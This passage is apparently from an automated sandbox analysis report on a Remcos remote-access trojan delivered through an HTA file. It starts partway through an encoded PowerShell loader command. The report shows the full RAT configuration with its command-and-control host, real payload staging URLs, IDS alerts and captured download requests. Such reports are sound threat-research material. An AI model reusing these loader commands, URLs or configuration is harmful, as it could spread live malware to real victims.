dpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", ProcessId: 5092, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Registry Key setAuthor: Joe Security: Data: Details: 4F 05 39 4C 0E 10 07 FA A0 83 1E FB 6D 42 F1 51 F8 67 AF 4B A1 45 63 EA D6 6C 9E 6A F7 D5 05 90 72 B4 3E 70 38 47 53 AF 6F 17 45 44 3C CC 20 5E D7 DA 30 F1 1A 90 58 BD A2 82 9B B7 47 CF E3 03 95 99 FC 1A 4E FC 8D 63 DA 65 44 12 92 55 03 87 FB 76 92 E6 97 0D C5 F7 43 33 58 7E 81 28 CD D5 49 E7 98 A4 D1 25 0A EE 43 15 0D 8B 22 41 6D C9 DA 3C , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-QEQMVZ\exepath
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T11:23:30.189989+010020204251Exploit Kit Activity Detected104.21.84.67443192.168.2.649759TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T11:23:30.189989+010020204241Exploit Kit Activity Detected104.21.84.67443192.168.2.649759TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T11:22:54.286610+010020365941Malware Command and Control Activity Detected192.168.2.650016192.169.69.2614645TCP
                    2024-12-11T11:23:42.070450+010020365941Malware Command and Control Activity Detected192.168.2.649765192.169.69.2614645TCP
                    2024-12-11T11:23:53.595653+010020365941Malware Command and Control Activity Detected192.168.2.649793192.169.69.2614645TCP
                    2024-12-11T11:24:05.016800+010020365941Malware Command and Control Activity Detected192.168.2.649823192.169.69.2614645TCP
                    2024-12-11T11:24:16.489153+010020365941Malware Command and Control Activity Detected192.168.2.649851192.169.69.2614645TCP
                    2024-12-11T11:24:27.937721+010020365941Malware Command and Control Activity Detected192.168.2.649879192.169.69.2614645TCP
                    2024-12-11T11:24:39.404581+010020365941Malware Command and Control Activity Detected192.168.2.649907192.169.69.2614645TCP
                    2024-12-11T11:24:51.203478+010020365941Malware Command and Control Activity Detected192.168.2.649938192.169.69.2614645TCP
                    2024-12-11T11:25:02.711340+010020365941Malware Command and Control Activity Detected192.168.2.649965192.169.69.2614645TCP
                    2024-12-11T11:25:14.227525+010020365941Malware Command and Control Activity Detected192.168.2.649992192.169.69.2614645TCP
                    2024-12-11T11:25:25.659401+010020365941Malware Command and Control Activity Detected192.168.2.650003192.169.69.2614645TCP
                    2024-12-11T11:25:37.107534+010020365941Malware Command and Control Activity Detected192.168.2.650004192.169.69.2614645TCP
                    2024-12-11T11:25:48.643825+010020365941Malware Command and Control Activity Detected192.168.2.650006192.169.69.2614645TCP
                    2024-12-11T11:26:00.424029+010020365941Malware Command and Control Activity Detected192.168.2.650008192.169.69.2614645TCP
                    2024-12-11T11:26:11.961120+010020365941Malware Command and Control Activity Detected192.168.2.650009192.169.69.2614645TCP
                    2024-12-11T11:26:23.541405+010020365941Malware Command and Control Activity Detected192.168.2.650010192.169.69.2614645TCP
                    2024-12-11T11:26:35.057421+010020365941Malware Command and Control Activity Detected192.168.2.650012192.169.69.2614645TCP
                    2024-12-11T11:26:46.560481+010020365941Malware Command and Control Activity Detected192.168.2.650013192.169.69.2614645TCP
                    2024-12-11T11:26:57.999070+010020365941Malware Command and Control Activity Detected192.168.2.650015192.169.69.2614645TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T11:23:13.327409+010020490381A Network Trojan was detected151.101.1.137443192.168.2.649710TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T11:23:31.159684+010028582951A Network Trojan was detected104.21.84.67443192.168.2.649759TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T11:23:02.599903+010028587951A Network Trojan was detected192.168.2.649707172.245.142.6080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-11T11:23:29.784941+010028410751Malware Command and Control Activity Detected192.168.2.649759104.21.84.67443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFAvira URL Cloud: Label: malware
                    Source: rmcnewprojectadd.duckdns.orgAvira URL Cloud: Label: malware
                    Source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["rmcnewprojectadd.duckdns.org:14645:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QEQMVZ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Source: nicegirlforyou.htaReversingLabs: Detection: 26%
                    Source: nicegirlforyou.htaVirustotal: Detection: 29%Perma Link
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.4536165624.0000000001348000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0043294A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_0043294A
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_6b4e9e9e-5

                    Exploits

                    barindex
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6860, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00406764 _wcslen,CoGetObject,11_2_00406764

                    Phishing

                    barindex
                    Source: Yara matchFile source: nicegirlforyou.hta, type: SAMPLE
                    Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49759 version: TLS 1.2
                    Source: Binary string: q:C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.pdb source: powershell.exe, 00000003.00000002.2201944807.0000000004F96000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2464644266.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2465328781.00000000073BA000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,11_2_0041B43F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0044D5F9 FindFirstFileExA,11_2_0044D5F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,11_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00406AC2 FindFirstFileW,FindNextFileW,11_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,11_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00418C79
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,11_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00406F06

                    Software Vulnerabilities

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.6:49707 -> 172.245.142.60:80
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49793 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49823 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49851 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49765 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49879 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49907 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49938 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49965 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49992 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50003 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50004 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50008 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50010 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50012 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50013 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50009 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50015 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50006 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50016 -> 192.169.69.26:14645
                    Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.6:49759
                    Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.6:49759
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.6:49710
                    Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.6:49759
                    Source: Malware configuration extractorURLs: rmcnewprojectadd.duckdns.org
                    Source: unknownDNS query: name: paste.ee
                    Source: unknownDNS query: name: rmcnewprojectadd.duckdns.org
                    Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /r/03xCn/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
                    Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                    Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49759 -> 104.21.84.67:443
                    Source: global trafficHTTP traffic detected: GET /551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.142.60Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_02B47A18 URLDownloadToFileW,3_2_02B47A18
                    Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /r/03xCn/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.142.60Connection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                    Source: global trafficDNS traffic detected: DNS query: paste.ee
                    Source: global trafficDNS traffic detected: DNS query: rmcnewprojectadd.duckdns.org
                    Source: powershell.exe, 00000003.00000002.2201944807.0000000004F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/551/sheism
                    Source: powershell.exe, 00000003.00000002.2201944807.0000000004F96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF
                    Source: powershell.exe, 00000003.00000002.2206466592.0000000007FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF4
                    Source: powershell.exe, 00000003.00000002.2206466592.000000000801E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFC:
                    Source: powershell.exe, 00000003.00000002.2206466592.0000000007FE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.245.142.60/551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIFl
                    Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.2201944807.000000000513E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000003.00000002.2203877007.0000000005BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.2201944807.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000004A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.2201944807.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2433234486.0000000004A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.2201944807.0000000004CA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000008.00000002.2433234486.0000000004CEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
